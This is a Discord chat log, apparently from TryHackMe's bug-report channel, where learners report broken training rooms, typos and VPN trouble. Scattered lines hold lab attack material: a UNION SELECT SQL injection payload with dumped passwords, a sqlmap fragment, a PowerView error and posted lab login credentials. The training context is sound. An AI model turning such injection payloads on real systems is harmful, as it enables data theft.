even on their screens they are running windows

eternal summit
#

Yeah.

#

You run it on the target machine.

warped ridge
#

oh i got it i need to ssh into their windows machine and from there attack :C

warped ridge
livid escarpBOT
#

Gave +1 Rep to @eternal summit

warped ridge
#

ok rip

#

PS C:\Users\Administrator\Downloads> . .\Downloads\PowerView.ps1
. : The term '.\Downloads\PowerView.ps1' is not recognized as the name of a cmdlet, function,
script file, or operable program. Check the spelling of the name, or if a path was included,
verify that the path is correct and try again.
At line:1 char:3

  • . .\Downloads\PowerView.ps1
  • + CategoryInfo          : ObjectNotFound: (.\Downloads\PowerView.ps1:String) [], CommandN  
    

otFoundException
+ FullyQualifiedErrorId : CommandNotFoundException

#

like WaT

eternal summit
warped ridge
warped ridge
livid escarpBOT
#

Gave +1 Rep to @eternal summit

gleaming shadow
#

In the tshark room, the file downloads as .cap, is this intentional?

soft terrace
gleaming shadow
#

ok

tight oriole
#

is anyone getting very poor performance on vulnnet internal

#

it hangs for a few minutes at a time every few minutes

ruby swift
glad badger
livid escarpBOT
#

Gave +1 Rep to @soft terrace

coral shadow
#

Found another text bug - https://tryhackme.com/room/introtoshells intro to shells room, task 4. "Explaining this is outwith the scope of the room." should be "Explaining this is out of scope for the room." : Also if possible - please link to information when claiming out of scope so we can follow up if we don't know and want to know.

eternal summit
#

Nope, outwith is a word

#

This has come up before, Muirland is a Scot and is allowed

coral shadow
#

it's still horrible english and bad form for training materials.

obsidian kiln
#

Speak for yourself smh

#

I'm a Scot -- it's a common part of Scots vocabulary

coral shadow
#

Sure, but regional dialects are not appropriate for training materials. (Something I should know with my experience teaching English as a second language)

obsidian kiln
#

In that case the Americans are screwed -- Americanisms are one big regional variation of English

coral shadow
#

lol I don't disagree

viral cobalt
#

I mean, googling the world in the U.S. does get you the definition, so it's not some secret kekw

coral shadow
#

Just saying that it would be more understandable and better quality with the change to more standard terms.

eternal summit
#

And the end of the day, it's muir's room and he can do what he wants

obsidian kiln
#

I suspect the Americans may also disagree with you

eternal summit
#

I dislike the idea of stripping the character out of rooms in that way

obsidian kiln
#

Hell, Offsec materials are written in American English -- I assume those are also poorly written?

eternal summit
#

The second point, however, is maybe worth it?

obsidian kiln
#

I'd imagine the same goes for INE, for that matter

eternal summit
#

Including/mentioning the material that's out of scope is probably a good idea

viral cobalt
coral shadow
#

Muiri ... honestly yeah... a lot of training material is pretty terrible

obsidian kiln
#

Heh, I'll ping TJNull if you wanna say that to his face? πŸ˜†

coral shadow
#

Tis all good - consider it an improvement suggestion. I think it would be cool to see THM gain more traction and be considered the defacto training solution.

obsidian kiln
#

It would, but it can do that quite nicely with some of us writing in American, some us writing in Scots, and absolutely no one writing in Queen's English

coral shadow
#

haha aye, no one needs that pompous stuffy crap

zealous vortex
#

I complained about the very same thing, and got the very same response. But we love Muiri blobheart , and he makes awesome rooms, so as James said, he can kinda do what he wants πŸ™‚

#

I too, would like extra context on lots of stuff though. Usually I google or read man pages or whatever, but the quality is hit or miss at times

#

I just wish we had a disclaimer at the top of Muiri rooms so I could read all the text in a Scottish accent. But that suggestion hasn't been implemented yet sadcooctus

glad badger
tardy vigil
#

Hello i'm trying to solve Windows PrivEsc but when connecting using RDP its not connected

#

I have tried on Both linux and windows and no connection

glad badger
tardy vigil
placid abyss
#

Shouldn't it be will?

wheat fractal
#

That's not a bug I guess.

#

Or is it?

placid abyss
#

Not a bug but the room channel hasn't been made yet and most of the time, room spelling errors come here :) @wheat fractal

wheat fractal
#

Oh okay.

eternal summit
#

Typos in rooms go here too

flat coyote
#

I cant submit answer in Task 6 question 3 at MITRE room.
I'm trying to submit correct answer and always receiving errors.

glad badger
#

I've added this as a Hint to Task 6 Question 3. πŸ™‚

normal holly
#

Hiya folks, not sure if this has been mentioned before, but I'm working through the OWASP Top 10 room and Task20 makes use of a XSS playground web app that's super laggy. The page doesn't seem to load completely and navigating to the stored-xss page won't load a comments section so the stored-xss tasks can't be completed.

proud delta
#

Hello guys, i'm doing the https://tryhackme.com/room/uploadvulns and i've done the steps for setting the /etc/hosts but in my attacker box i can't load the sites with uploadvulns.thm; however with a command like firefox http://overwrite.uploadvulns.thm it seems to work but i can't acces the demo one. I have added it in the /etc/hosts file too. Is it normal with the attacker box ( with firefox on kali it won't load and with command line it works for 2/3 only). I have also tried with openvpn and the /etc/hosts of my windows computer it won't find the pages. Is the room bugged or am i doing something wrong ? (I followed the recomandations in the room to the point) Thank you in advance πŸ™‚

#

It doesn't work on my kali vm either 😦

obsidian kiln
proud delta
#

dang i'm stupid πŸ˜‚ Sorry. My bad. Thanks. I should stop doing those in parallel my classes I seem to become stubborn !

obsidian kiln
#

Np πŸ™‚

eternal summit
obsidian kiln
#

Aye

hazy tiger
#

And 100x bigger?

proud delta
#

I repent for my stupidity.
I carefully read it
And acknowledged, noded
And immediatly forgot 🀣

hazy tiger
#

I do that all the time tbh

soft terrace
#

Same room
Task 7
Bug: shouldn't it be "than" instead of "then"?

worthy gale
#

seems fuelCMS in the db has changed to "fuel CMS"

obsidian kiln
#

Fixed πŸ‘

cold orchid
#

hello
[01:07]
touch noot.txt
[01:07]
./shiba1
[01:08]
bash: ./shiba1: No such file or directory
[01:08]
pwd = /root
[01:09]
root@ip-10-10xxxxxx:~# find shiba
find: \u2018shiba\u2019: No such file or directory

zealous vortex
#

In room linuxprivesc, the 'locate' command fails because the locatedb is out of date.

eternal summit
ornate wigeon
#

hey guys, I am doing a recording of room blaster. but I found there is no broswer history in that IE browser 😒

eternal summit
#

Known issue. Dark marked it as WontFix.

ornate wigeon
#

oh okay

#

tyty

#

I think maybe its good to add it in the box if possible

#

hehe

eternal summit
#

Only the creator can do that, dark is quite busy.

ornate wigeon
#

okay gotcha

#

thanks tho!

twin bay
livid rose
#

network services task 6 section

eternal summit
#

@livid rose not a bug, you have the wrong machine deployed

livid rose
livid escarpBOT
#

Gave +1 Rep to @eternal summit

dusky junco
#

oof I don't think I have a backup of that from when I started

obtuse musk
#

Β―_(ツ)_/Β―

sonic willow
#

@obtuse musk that will be the answer tolerance :)

obtuse musk
#

LOL

sonic willow
#

not really a bug but this room: https://tryhackme.com/room/csp, task 3

http is bolded to bring attention the the fact it's using a different protocol, so subdomain. and .org should also be bolded imo

wheat fractal
#

Alfred room, Task 1 there is a bug with the first question

#

without filling in a answer it accepts it

placid abyss
#

Reload the page @wheat fractal

wheat fractal
#

ahw check, that worked! @placid abyss . Thanks

livid escarpBOT
#

Gave +1 Rep to @placid abyss

quick tendon
#

Hi Guys,

i'am not sure if it is a Bug, but in my opinion it is. I'am in the Beginner Path in Network Services at Task 6 . The the question six is " Based on the title returned to us, what do we think this port could be used for?" And the "correct" answer is " S Backdoor", but i think here is the Bug. The correct answer should be "Skidy's Backdoor". It looks like here is the problem with the missing " Skidy' " (hopefully it is understandable what i mean, english is not my nativ language)

Cheers

SG

#

Sorry if i see it correctly this belongs to the bugs room here, sorry.

zealous vortex
quick tendon
#

ok but the Field in the answer section is also * ******

#

and it acpeted S Backdoor , but i know what you mean and make sense to me

zealous vortex
#

the answer fields allow for a certain amount of error. If you refresh the page, it should show the true/correct answer

quick tendon
#

ok thanks πŸ˜‰

zealous vortex
#

you're welcome

wheat fractal
#

Hello, I have a problem with the first task file from the John the Ripper room. I think it is corrupted because I cannot open it, other task files from the room seem to work. I tried to cat the contents and it's totally not readable. Does anybody have the contents of the task file at hand and can send it to me?

eternal summit
#

What's the file called? @wheat fractal

#

There's a bug with THM atm where the file names are removed and you get just the extension

wheat fractal
#

when I download it it;s called zip

#

but the others in the room are downloaded with the name 'txt'

#

and they work

eternal summit
wheat fractal
#

ok, thanks!

twin bay
#

Gotta start somewhere πŸ™‚

#

A txt (Or commonly a filename ending with .txt) is generally a txt file - Which means its readable - Like a book.
A zip (Or commonly a filename ending with .zip) is generally a compressed file - Which means its got all the data squished together in a form you wont be able to read - So you need to unzip it. Other compressed (Or archived) extensions are commonly .rar, .tar, .7z, .gz

#

When you're more experienced you'll be able to use the file header to see what type of file it is, even with no extension

eternal summit
#

There's a site bug atm, it's annoying

#

Also the file command is good

glad badger
#

I've forwarded the Task File name issue. πŸ™‚

raven linden
hazy tiger
coral barn
hazy tiger
#

Hey @coral barn that’s a private room :)

#

As private rooms aren’t accessed by the majority of people, the bugs are up to the room creator to change.

It looks like the room hasn’t been released so it’s not as important yet

coral barn
#

Ok, I understand. Thank you for the response @hazy tiger

livid escarpBOT
#

Gave +1 Rep to @hazy tiger

raven linden
# hazy tiger Refresh your page and check again?

Yes, after refreshing it is spelled in one word. I spelled it with a space, which the page accepted, but on the server its consequently spelled with "-" and that is not accepted by the THM page

strong kelp
#

how did you accessed a private room and saw it's tasks?

potent bane
sonic willow
#

the room isn't released publicly yet, how did you all get the room code?

eternal summit
#

Probably in a learning path

potent bane
#

From here to be specific.

sonic willow
#

oh there's a dns one coming

#

bye bye :yep:

sonic willow
#

(would like to point out that Detail has a capital in DNS but lowercase in HTTP)

wide ermine
#

there seems to be a bug with the Ice room when trying to exploit the machine. Several people have posted it on the thm forum and no one seems to have a solution. The exploit is supposed to create a session, but never does after completing the exploit.

eternal summit
#

The room hasn't changed, and it works for the majority of people. Usually, the issue is that people have incorrect options.

zealous vortex
#

Not really a bug, just a graphical issue. The new DNS in detail room- tasks 2 and 3, have a background color specified for the text, which looks odd with dark mode plugins. The other tasks look fine.

cedar pebble
#

Hey yo, In the new room : httpindetail, a flag isnt working i think. Task :Make a GET request to /room

wheat fractal
#

it says that the flag is wrong

eternal summit
#

Should also be you're

#

Honestly disappointed at that grammar

twin bay
#

The flag for Task 7 Question 1 doesn't seem to work
The flag it gives is typo'd (Missed an E)

#

... Aaah - You beat me :p

glad badger
#

We're aware of the discrepancy for the HTTP in Detail room for Task 7, Question 1. πŸ™‚

wheat fractal
eternal summit
#

Yeah.

#

But grammatically it should be you're

#

I wasn't arguing with the flag not working.

wheat fractal
#

ahw gotcha, it works now

#

; )

zealous vortex
#

Not really a bug per se, but the new httpindetail room doesn't mention a key distinction between put and post, which is idempotence.

#

also, task 4 background colors are hard to read with dark mode plugins.

tired hull
#

Hey guys, the "Sysinternals" doesn't work for me. I cant make \live.sysinternals.com\tools<toolname> working. I'm following all the steps like getting the service Webclient Running, Install-WindowsFeature WebDAV-Redirector –Restart but it seems like I can't turn on the Network Discovery. When I turn it on and save, it looks like it goes back to "off" for my profile.
When I then try again "\live.sysinternals.com\tools\procmon.exe" it says "cannot find network path" like I don't have any network connection. I "RDP" the machine to access .

raven linden
#

In the "Cutting out the noice" part of the "Sysmon" room there is a "4" missing in this command "Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=444'" (the text before says 4444 not 444)

raven linden
ornate wigeon
#

Hey, in room osquery, Under Creating Queries Task, the question was asking where the username length is 3 was not showed in the answer

ornate wigeon
#

Also in the next task. I think we need to run sudo with

fluid otter
#

Hello, I'm doing the splunk room. The splunk machine doesn't start. I tried several times and waited more than 5 minutes.

jolly kelp
#

Web Fundamentals: Task 3, Question 1 accepts an incorrect answer

eternal summit
jolly kelp
#

It accepts "pos"

eternal summit
#

That's not a bug with the room

#

That's a bug with THM.

jolly kelp
#

Ah right

eternal summit
#

Refresh the page. It's just answer tolerance

glad badger
livid escarpBOT
#

Gave +1 Rep to @raven linden

sleek scroll
#

why am i getting "connection timed out " in almost all rooms

eternal summit
#

Probably because you are not connected to the VPN

dull forge
eternal summit
#

The city is asking for the city associated with microsoft.com not facebook

dull forge
#

ho ok, I missed the previous question πŸ˜… my bad

royal pine
eternal summit
#

Iceland?

royal pine
eternal summit
#

I think this has been reported and the room creator said something about it, hold on a sec

#

Certainly been reported a few times

sleek scroll
#

@eternal summit i was connected to it

#

tried to restart it too

sonic willow
#

https://tryhackme.com/room/wreath, task 9

i think this question could be worded like DNS servers or DNS resolvers rather than entries since DNS entries typically refer to DNS records (A, AAAA etc.) which would be your /etc/hosts

devout quarry
#

Heyo, I think there's an error/typo in the John the Ripper room in the beginner path. It seems to swap P and NP in the explanation https://i.imgur.com/NkYme3x.png so they have the backwards meaning

tepid tartan
#

<@&568449888682246145> Vulnversity room is not loading!!! Trying from yesterday

hazy tiger
ivory wigeon
#

is the metasploit room loading for anyone?

tepid tartan
red hill
#

Is there something wrong with attacktive directory?

#

maybe doesn't work with the latest impacket?

eternal summit
#

It's not going to be bug with the room, but perhaps some of the tools have changed.

hushed acorn
#

In the volatility room it says "On Debian-based systems such as Kali this can be done via 'apt-get install volatility' but kali has dropped volatility repos and you wont be able to apt-get it without adding repos.

#

@heavy spade

heavy spade
#

well that's annoying lol

#

Thank you for reporting that!

hushed acorn
#

np

sharp zodiac
#

@dusky junco can I text you in private?

thin tartan
#

so in buffer overflow prep, instructions say to run exploit.py with python3 but it only works with python,,, ???

solid valve
#

Hello everyone

#

Any news on Rust room?

#

Room doesn't work more than 2 weeks

#

Can anyone please reach out to "bee" user regarding this?

eternal summit
fading warren
#

hi, I just finished the Overpass 3 room and the first flag should be own by apache but it's a root flag is it normal ?

eternal summit
sonic willow
#

task 2 should also probably have the highlighted text in a code block thingy like the rest

glad badger
livid escarpBOT
#

Gave +1 Rep to @sonic willow

fading warren
eternal summit
#

Belongs doesn't always mean the owner

#

It's belongs in a non-linux sense

fading warren
wheat fractal
obsidian kiln
stoic cobalt
#

Is the Vulnversity room down by any chance?
I just cannot access it.
Whereas other rooms and machines are responding well, why and what is the reason Vulnversity isn't accessible to be?

#

me*

eternal summit
#

Rooms can't be down

#

It's a site bug atm

#

Admins are aware. They're working on it.

raven linden
#

In the Blaster room, the first question in Task 3 doesn't seem to be answerable anymore (at least not in the way shown in the official walkthrough) as Internet Explorer is set to delete its history after 20 days

eternal summit
#

It's been closed as wontfix

#

You can find the cve via the file.

craggy swift
#

hello everyone. I am just working on "Internal". The internal wordpress site does not work properly. Many links are down and logging in is not possible. I also tried it with the provided AttackBox, same result.

obsidian kiln
#

@craggy swift I would put money on you not adding it to your hosts file, in which case it's not a bug. That's just how WordPress responds to being accessed from the wrong domain

raven linden
eternal summit
#

Again. Closed as wontfix.

raven linden
eternal summit
#

No.

#

It's an incredibly small issue in a challenge room that's worked around very easily.

raven linden
#

Yes, I agree that the issue itself is small but the hint is explicitly misleading. I just have to decide if I still want to waste money on THM, if this is the reaction I get when pointing out bugs.

eternal summit
#

Remember that many rooms are created by community members

#

Also remember that the discord is not official support.

raven linden
#

Yes, I mainly am dissatisfied with your answers. If the answer would have been: "We know it is broken, but it won't be fixed, because it isn't worth the effort" that might have been fine. But I clearly got the message, that I shouldn't point of bugs, that can be worked around

eternal summit
#

I'm not official support either.

#

You're free to be dissatisfied with my answers because I'm under no obligation to provide satisfactory answers, as a volunteer.

#

You should point out bugs. You just cannot expect every single thing to be fixed. Room creators are often working or studying full time in addition to creating rooms.

raven linden
#

I have full understanding for that. I just got in doubt if I should point out bugs. Thank you for the explanations

glad badger
raven linden
livid escarpBOT
#

Gave +1 Rep to @glad badger

spark trail
eternal summit
#

I think you need to add it to /etc/hosts?

#

Can you provide a little more detail than "not working"?

#

!docs verify

tropic flameBOT
eternal summit
#

Follow these steps so that you can post screenshots

spark trail
#

I have shared the image as i was unable to copy paste here

eternal summit
spark trail
#

ok thx

#

the webserver is not up in the box...thx

zealous vortex
#

Not all boxes have web servers. But try it without the https, just http

eternal summit
#

Also a portscan

sleek scroll
#

i cant solve one question of attacking kerberos....i mean i solved it but it says not correct....i checked write ups,blogs,videos the ans is correct but its not accepting it

eternal summit
spark trail
eternal summit
#

Yeah. Fix your VPN.

spark trail
#

is it because i am getting connected through mobile hotspot???

eternal summit
#

IDK, I just know your VPN probably isn't correctly functional

spark trail
#

thx a lot

jolly kelp
#

I think this may be a bug - doesn't require answer. XXE: Task 5.

eternal summit
#

It's a question to get you to think about it

abstract holly
#

This room is stuck on loading.

eternal summit
#

Site bug, not a room bug

#

The admins know

abstract holly
#

oh okay, got it

wheat fractal
#

thank you @tall nexus for the Linux Strength Training room πŸ™‚ fun way of drilling in things I've had to look up for years every time I needed to use them

livid escarpBOT
#

Gave +1 Rep to @tall nexus

wheat fractal
#

very minor thing: Task 4 question 2, the [MACHINE:IP] markup doesn't auto-replace (I'm not dreaming, it does that in other rooms, right ?)

eternal summit
#

MACHINE:IP sounds like a typo

#

MACHINE_IP should autoreplace but I've seen it being a bit weird around special characters

zealous vortex
#

Kenobi has a few instances that don't auto-replace, but I don't think they were designed to

dark raptor
# red hill Is there something wrong with attacktive directory?

This one got me too- syntax is everything! What I learned here is unless you are running as root for everything on your system, you will run into permission issues like this one unless you use sudo or switch to root to run the command. Also adding the '-debug' flag at the end of command lines can really help you sort out the problem.

red hill
dark raptor
tacit parcel
#

Hey folks, anyone could explain me the points system!? I read about them, but I'm a bit confused when a I see the following....

On Pickle Rick room...

This is 799 days old, but there is a guys that made this room the last 25th of April and received 80 points per answer, there are other guys that made the room at the same day but received 30 points per some answers and finally I received only 30 points per answer on my all answers.

So, could any one explain me why this differences!? I guessed that this room is so old, that all of us would receive 30 points, or am I wrong!?

Thanks in advance!

viral cobalt
tacit parcel
livid escarpBOT
#

Gave +1 Rep to @viral cobalt

calm nest
eternal summit
cedar patrol
#

Is the room Daily Bugle down. I tried pinging and not getting any response also. Tried restarting the machine 2 times but the problem persists.

#

Anyone, any idea?

eternal summit
#

Rooms cannot be down as the VMs are not shared

#

Usually, this means a VPN issue.

cedar patrol
#

Ok thanks @eternal summit

livid escarpBOT
#

Gave +1 Rep to @eternal summit

proper jasper
#

PSEXEC works on vulnnet roasted when not a subscriber, but does not work when you are one. Not sure what the issue is, but a non subscriber told me psexec is working every time, but for me as a subscriber it’s not working at all. Command syntax is the same, and scenario is identical.

misty cave
#

the answer is ||03/02/2019|| if anyone wants to confirm

glad badger
livid escarpBOT
#

Gave +1 Rep to @misty cave

deep pivot
#

Task 7 On the OWASP juice shop is not working for me. I am getting the pop up to hit okay, but afterwards I am not getting the flag. Has anyone else encountered this? It is not even letting me select them being completed on score-board page.
NEW

placid quail
#

Good evening, Yara room Task 11 last question hint has a typo in the hint which could lead to some frustration πŸ˜„

#

it should be thor-webshells.yar and not thor-webshell.yar

#

Just wanted to share to possibly help anyone else going through the room and trying to use "locate" to find the file lol

true knoll
#
-p username --dbms sqlite --technique=U --no-cast```
modest mica
#

there is a minor bug in https://tryhackme.com/room/owasptop10 , task 14 [Severity 4] XML External Entity - DTD ,
in second to last line: !ELEMENT body - Defines the body element to be of type "#PCDATA"
element is highlighted but body should be as in the case of the preceding 3 lines

wheat fractal
#

Need to update on: https://tryhackme.com/room/wireshark

Old: RSA key navigate to Edit > Preferences > Protocols > SSL > [+], you will need to fill in the various sections

Needs to update SSL to TLS. SSL isn't listed in current verison on wireshark anymore.

rustic snow
turbid oasis
#

For Internal room (https://tryhackme.com/room/internal), I not sure if this is considered a bug... but when trying to crack the password for Jenkins, my hydra in attackbox is yielding different results from my own kali vm connected through openvpn.
Attackbox keeps returning superman as the password while my own kali vm gives the correct password.

strong kelp
velvet totem
viral cobalt
#

it's on my to-do list

glad badger
livid escarpBOT
#

Gave +1 Rep to @rustic snow

rustic snow
glad badger
livid escarpBOT
#

Gave +1 Rep to @strong kelp

covert atlas
#

Hey, I have a question regarding a badge that I should already have since I finished all the required rooms but it isnt available yet.

civic brook
#

which badge

covert atlas
#

WorldWideWeb (the newest one)

civic brook
#

you should be able to get that one, you may need to reset the "Putting It Together" room and complete, there was a bug on the badge originally when it was released

covert atlas
#

Oh ok that would explain things because I finished those when they came out.

#

Thx, it worked. Got it now.

orchid crag
#

OWASP10-A8-CMNatic has a bug I think in the https://tryhackme.com/room/owasptop10 room...
I would expect that the admin flag (2nd flag) isn't accessible before changing the cookie info, but it is. Tested it even by resetting the machine, and creating a new account and just visiting the admin url.

#

Guess he coded it with VIM and that made it that an error slipped in perhaps meowgrin

dusky junco
livid escarpBOT
#

Gave +1 Rep to @orchid crag

twin bay
#

I'm HOPING this is a bug - The cmess room has ||the cronjob running every 2 hours instead of every 2 minutes||

#

Realistic? Sure.
Good for a CTF room? Not so much.

astral anvil
#

*/2 * * * * which is listed in /etc/crontab

#

Β―_(ツ)_/Β―

twin bay
#

Click hours and look which it highlights

astral anvil
#

You done?

twin bay
#

Hmm - Weird - First time I did it, it did hours

astral anvil
#

You'd be the first to have that issue as the rooms been out for over a year and this is the first time I've heard that issue

twin bay
#

After additional checking - Yea - It was my side... My bad 😐

#

*Sighs* - Thanks :p

late falcon
#

In the room network services, task 2, created by PoloMints, I'm not sure this sentence is correct :

eternal summit
#

What do you think is wrong with it?

late falcon
#

My first language isn't english but it seems the sentence isn't correct, I understood it as :
What do clients use to connect to servers

eternal summit
#

yeah, that's how it reads to a native english speaker

late falcon
#

Ok then, TIL ! Thanks

hollow sorrel
#

The report returns a service error

zealous vortex
sharp gale
orchid crag
#

I think the answer should be wrong. First of all, it's spelled wrong. Second of all. It was the first that came up in my mind while I'm sure that it would be called something different like ...side XD EDIT: Redacted for spoilers....

#

So no idea how it accepted my wrong typing as the correct answer.

eternal summit
orchid crag
#

Yeah good call... XD I didn't assume it would have a tollerance for answers.

woven pawn
#

In the MAL: Researching room it tells me this:

#

However the question says 6 million

#

Not 6 billion

#

It is actually 6 billion, I clicked on the link in the text.

woven pawn
#

Another potential issue with that room

#

I'm trying to RDP into the box, I have my openvpn on, I've checked and double checked that the creds are right, but it's saying the username or password is incorrect

#

Never mind, RDP working now πŸ™‚

static depot
#

I'm hoping this is the correct place to post this-
I'm currently on Task 5 (Remote Code Execution) in the Upload Vulnerabilities Room, and when I try to connect to shell.uploadvulns.thm, I get a 503 error
I can ping the IP of the target room and receive a response, but when I try to run GoBuster, for example, it can't reach the URL

zealous vortex
#

probably something you're doing wrong, that room has been pretty well tested.

static depot
#

Oh darn I terminated the room and don't think I re-entered the echo command listed at the top of the room when I restarted... will try that. My bad

zealous vortex
#

Make sure when you edit your hosts file that you don't have duplicate entries

static depot
#

Gotcha. Entered that echo command and problem fixed. Not enough coffee for me today πŸ˜›

lusty shuttle
#

ustoun box is literally unplayable , sql server is not running 95% of time , and when its running it dies after running 2 commands

thin sleet
#

I hope this is where I should post this. Ping me if I need to post this somewhere else. I'm pretty new to THM.

Title: nfs2 - Task: 4

Room answer says bash file permissions should be ||-rwsr-sr-x ||. The default file from the github link has permissions || -rw-r--r-- ||. No big deal, chmod to set perms to || -rwsr-sr-x || but when you continue through the room and try to run ./bash -p on the target machine it errors with permission denied.

I was able to continue past the task by setting file permissions to || -rwsrwsrwx ||.

The room says "Make sure that it ends with || -sr-x ||" so I assumed my initial chmod should have worked. Maybe I misread some information in the room but maybe someone more knowledgeable can double check this and make sure there's not an issue with the room.

zealous vortex
#

Just guessing here, but it might have been owned by the wrong user

thin sleet
#

The task told me to do "sudo chown root bash" which I did and verified with ls -la bash. I don't think that's the issue but I'm so green I'm not going to say you're wrong lol. It's entirely possible I did something wrong. I don't think I did but idk πŸ˜…

orchid crag
#

The Blue room is seriously buggy... I had to restart the machine like 5 times already before it finally succeeded. Then the exploit with meterpreter failed, so had to reboot again, had to reboot the machine itself another 2 times before the blue exploit worked again. Then when finally having meterpreter flag2 is missing...

Is it possible to solve some of these bugs in some way or another? As this is just not really helping the education. All it teaches me is that the Blue exploit will fail to run 4 out of 5 times, and is unstable like hell. Spend about 3 hours already on the room because of all the issues with the VM.

hazy tiger
#

It’s not the machine, it’s the exploit.

#

The exploit is unstable and screwing it up can crash the whole room. It teaches you that you should be more careful and not all exploits work everytime.

orchid crag
#

Yeah okay... That is what I indeed learned that the exploit is unstable... Would have loved if it was learned in another way though XD Got really tired of having to reboot the machine and waiting a full minute every time.

placid abyss
#

!dark

tropic flameBOT
#
DarkStar7471
Coming in voice chat was a mistake.
placid abyss
#

dammit

boreal grotto
#

Possible bug for room 'Blaster'
||Internet Explorer history doesnt show the site visited for the CVE||
I tried respawning and still see the same issue

obsidian kiln
#

Known bug. Dark doesn't wanna fix

dusky junco
#

I replaced the VM to include the CVE a while ago but it looks like IE clears the history after x amount of days

#

If I still have the OVA I'll re-uplaod

#

Fond them & the creds. I'll re-upload tonight @boreal grotto @obsidian kiln

dusky junco
#

VM replaced & made live -- just testing

#

Fully tested & made live thanks for reporting @boreal grotto

livid escarpBOT
#

Gave +1 Rep to @boreal grotto

dusky junco
#

cc @heavy spade πŸ˜„

boreal grotto
#

Thanks @dusky junco

dusky junco
#

πŸ€™

obsidian kiln
#

v22

#

I am very concerned

dusky junco
#

I've changed it to v3 πŸ˜„

rapid dagger
#

Working on Metasploit room, it needs an update on Task #7, second question

#

@heavy spade socks4a does not exist

dusky junco
#

There's no task that tells you to use socks4 as far as I can -- I updated it to include socks5 a while ago @rapid dagger unless i'm missing something?

#

http://tryhackme.com/room/rpmetasploit aye?

eternal summit
#

Can confirm, that seems to be the public room

zealous vortex
#

for these "wont fix" issues, is it at least posted in the known issues for the room?

eternal summit
#

No. There are very very few people who cam add issues there, unfortunately

obsidian kiln
#

Literally only the room creator

#

Not even manageroom perms give you that one

zealous vortex
#

So not even site admins like Dark and Skidy can do that? That's disappointing

#

seems like that would save some headaches for everyone

obsidian kiln
#

Oh, Skidy can definitely do it, but I suspect it's a "go into the DB job"

#

Given his account, afaik, just has all of the perms. If it's not in the manage rooms perm (which it isn't) then I doubt it's anywhere else

eternal summit
#

I maintain it should be given to room testers

rapid dagger
#

For some reason is not allowing me to add a screenshot

eternal summit
#

!docs verify

tropic flameBOT
eternal summit
#

Follow those steps, then you can post images

glad badger
rapid dagger
#

@dusky junco There it is

misty cave
#

https://tryhackme.com/room/osqueryf8 there's a couple of potential issues with Task 4. The number of tables for this version of Osquery seems to come from 4.6.0, (which matches the version on the vm), but the details before the question are all talking about version 4.7.0.

Then there's a couple of "how many tables is compatible with xyz" questions, which i think should be "are compatible", but i do kinda feel picky going for grammar.

viral cobalt
#

-undelete

livid escarpBOT
#

Up to 10 last deleted messages (last hour or 12 hours for premium):

none...

viral cobalt
#

thonk

tender kelp
jolly kelp
#

ZTH: Obscure Web Vulns, Task 2 grammatical mistake: "their may be" rather than "there may be"

#

Also, on Task 3, it doesn't explain what exactly the vulnerable code is

soft terrace
hazy tiger
#

aaaa that's annoying

#

Fixed @soft terrace Thanks for letting me know

livid escarpBOT
#

Gave +1 Rep to @soft terrace

radiant burrow
#

How do I download task files in Attackbox?

eternal summit
#

You can't, unfortunately

#

It's a pain, and it's something I raised with CMN

radiant burrow
#

:(

eternal summit
#

The only real way to do it is to sign in to THM from the attackbox which free users can't do

radiant burrow
#

I imagined that
but I wouldn't like to login from it lol

#

tks

radiant burrow
#

I'll record my screen

glad badger
glad badger
wheat fractal
#

hi all! Not sure if what I've done for pickle rick's third ingredient is intended or not... On the other hand I'm afraid to spoil it. Is there anyone I can DM or shall I just say it here ?

eternal summit
#

Have you checked the writeups?

wheat fractal
#

I haven't, in case what I've done is unintended. I'd still like to try to figure out the 3rd ingredient on my own if that's the case

wheat fractal
#

hah, indeed intended, and what I thought was real turned out to be a literal rabbit hole πŸ™‚ good fun

mighty shard
#

it seems to be an intermittent bug where the room would glitch out and complain about your time being almost up on the machine you spin up. Also it says it's been terminated and can't find it anywhere, but when you refresh the web page it's back

#

maybe some kind of cookie issue idk

hazy tiger
#

It’s a known issue :)

mighty shard
#

Oh ok in that case all good then πŸ™‚ at least it doesn't really break anything

dusty pivot
#

says time expiring soon even if I add one extra hour

mighty shard
teal barn
#

When using ||' UNION SELECT 1,group_concat(password) FROM users-- -|| the result should be displayed in challenge2_username but instead it is in challenge1_userobj and challenge1_username contains Unkown.

#

I obtained the following cookie ||b'{"challenge1_user_id":1,"challenge1_username":"Unkown","challenge1_userobj":[[1,"rcLYWHCxeGUsA9tH3GNV,asd,Summer2019!,345m3io4hj3,viking123"]]}'|| and teh flag is missing from the password list.

#

Here what's expected from the course material:

#

@outer sonnet

#

I tried resetting the VM and have always the same behavior.

#

sqlilabp3 suggests it's the 3rd version of the VM

frosty zealot
#

I am solving the cmess room.I have foudn the correct credentials (andre@cmess.thm:KPFTN_f2yxe% ) for gil cms login panel but it still gives me error rwong email or password.Room link https://tryhackme.com/room/cmess

#

is this a bug ?

#

I have verified the creds with sevearls writeups

bitter raptor
#

Hiya!
Im doing the burp suite room .com/rpburpsuite atm and at Task 9 theres a link to another (older) burpsuite room .com/learnburp.

That room has been made private by the owner.

Still id like to get more experience with burps intruder. Is there another room that can substitute?

hazy tiger
#

Juice shop, upload vulns. Both rooms use burp suite to some extent, they’re not solely around burp suite but you do learn some new tricks.

I would highly recommend Upload Vulns because it is really useful to know.

wheat fractal
orchid crag
#

The real value though is in the additional software/capabilities that you can have with Burpsuite. Some of them are really handy/powerful even though they use somewhat the same capabilities of the default/free edition.

gleaming shadow
#

ZAP is pretty decent as well

wheat fractal
#

hi all, reporting a bug in the Hacking with Powershell room (https://tryhackme.com/room/powershell), Task 3 Question 1. Asks you to find "interesting-file.txt", but's it's currently actually "interesting-file.txt.txt"

wheat fractal
#

same for the .bak file in task 4 question 10, it's actually a .bak.txt NotLikeThis

obsidian kiln
#

That's Windows being dumb unfortunately

#

@glad badger could you add it to the fix list? πŸ™‚

eternal summit
#

What is demonstrated there is what happens when "Hide extensions for known file types" is enabled and people don't save things correctly

obsidian kiln
#

Okay, that's the technical answer
So, to put it in a rather more insulting, but more accurate way, that's the box creator being dumb unfortunately

glad badger
# wheat fractal

Does it find the file when you do -contains interesting-file.txt instead -eq interesting-file.txt?

wheat fractal
#

Hello there, I'm having trouble reaching the Metasploit room (other rooms load just fine) : could anyone try access it, just to know if it's just me plz ?

wheat fractal
#

PS : my ultimate engineer technique (log-off/log-in) is not working here

#

OK room is up again, just ignore me πŸ™‚

wheat fractal
#

